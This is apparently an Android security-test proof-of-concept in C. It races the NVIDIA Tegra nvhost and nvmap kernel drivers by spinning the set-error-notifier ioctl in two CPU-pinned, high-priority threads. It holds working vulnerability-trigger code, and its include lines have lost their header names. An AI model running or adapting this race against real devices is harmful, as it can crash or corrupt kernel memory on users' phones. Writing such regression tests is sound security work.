/* * Copyright (C) 2016 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include struct nvhost_channel_open_args { __s32 channel_fd; }; struct nvhost_set_error_notifier { __u64 offset; __u64 size; __u32 mem; __u32 padding; }; #define NVHOST_IOCTL_MAGIC 'H' #define NVHOST_IOCTL_CHANNEL_OPEN \ _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args) #define NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER \ _IOWR(NVHOST_IOCTL_MAGIC, 111, struct nvhost_set_error_notifier) struct nvmap_create_handle { union { __u32 id; /* FromId */ __u32 size; /* CreateHandle */ __s32 fd; /* DmaBufFd or FromFd */ }; __u32 handle; /* returns nvmap handle */ }; struct nvmap_alloc_handle { __u32 handle; /* nvmap handle */ __u32 heap_mask; /* heaps to allocate from */ __u32 flags; /* wb/wc/uc/iwb etc. */ __u32 align; /* min alignment necessary */ }; #define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29) #define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28) #define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27) #define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0) #define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1) /* allocation flags */ #define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0) #define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0) #define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0) #define NVMAP_HANDLE_CACHEABLE (0x3ul << 0) #define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0) #define NVMAP_HANDLE_SECURE (0x1ul << 2) #define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3) #define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4) #define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5) #define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6) #define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7) #define NVMAP_IOC_MAGIC 'N' /* Creates a new memory handle. On input, the argument is the size of the new * handle; on return, the argument is the name of the new handle */ #define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle) #define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle) #define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4) int g_fd = -1; int g_nvmap_fd = -1; static pthread_cond_t cond = PTHREAD_COND_INITIALIZER; static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER; int g_channel_fd = -1; struct nvhost_set_error_notifier g_error_notifier; struct nvmap_create_handle g_nvmap_hdl; struct nvmap_alloc_handle g_real_alloc = {0}; int open_driver() { char* dev_path = "/dev/nvhost-vic"; g_fd = open(dev_path, O_RDONLY); if (g_fd < 0) { printf("open file(%s) failed, errno=%d\n", dev_path, errno); return -1; } else { printf("open file(%s) succ!\n", dev_path); } dev_path = "/dev/nvmap"; g_nvmap_fd = open(dev_path, O_RDONLY); if (g_nvmap_fd < 0) { printf("open file(%s) failed, errno=%d\n", dev_path, errno); return -1; } else { printf("open file(%s) succ!\n", dev_path); } return 1; } void trigger_channel_open() { struct nvhost_channel_open_args args = {-1}; ioctl(g_fd, NVHOST_IOCTL_CHANNEL_OPEN, &args); g_channel_fd = args.channel_fd; } int trigger_nvmap_create() { g_nvmap_hdl.size = 0x1000; ioctl(g_nvmap_fd, NVMAP_IOC_CREATE, &g_nvmap_hdl); return g_nvmap_hdl.handle; } void trigger_nvmap_free() { int data = g_nvmap_hdl.handle; ioctl(g_nvmap_fd, NVMAP_IOC_FREE, data); } void trigger_nvmap_alloc(int handle) { g_real_alloc.align = 0x1000; g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC; g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES; g_real_alloc.handle = handle; ioctl(g_nvmap_fd, NVMAP_IOC_ALLOC, &g_real_alloc); } void prepare_data() { g_error_notifier.offset = 0; g_error_notifier.mem = g_nvmap_hdl.handle; } void trigger_set_error_notifier() { ioctl(g_fd, NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER, &g_error_notifier); } void setup_privi_and_affinity(int privi, unsigned long cpu_mask) { setpriority(PRIO_PROCESS, gettid(), privi); /* bind process to a CPU*/ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) { } } void* race_thread(void* arg) { setup_privi_and_affinity(-19, 2); pthread_mutex_lock(&mutex); pthread_cond_wait(&cond, &mutex); pthread_mutex_unlock(&mutex); while (1) { trigger_set_error_notifier(); } return NULL; } void* race_thread_2(void* arg) { setup_privi_and_affinity(-19, 1); pthread_mutex_lock(&mutex); pthread_cond_wait(&cond, &mutex); pthread_mutex_unlock(&mutex); while (1) { trigger_set_error_notifier(); } return NULL; } int main(int argc, char**argv) { setup_privi_and_affinity(0, 1); if (open_driver() < 0) { return -1; } //trigger_nvmap_create(); trigger_nvmap_alloc(trigger_nvmap_create()); prepare_data(); //trigger_nvmap_free(); pthread_t tid; pthread_create(&tid, NULL, race_thread, NULL); pthread_create(&tid, NULL, race_thread_2, NULL); usleep(100 * 1000); pthread_cond_broadcast(&cond); sleep(100); return 0; }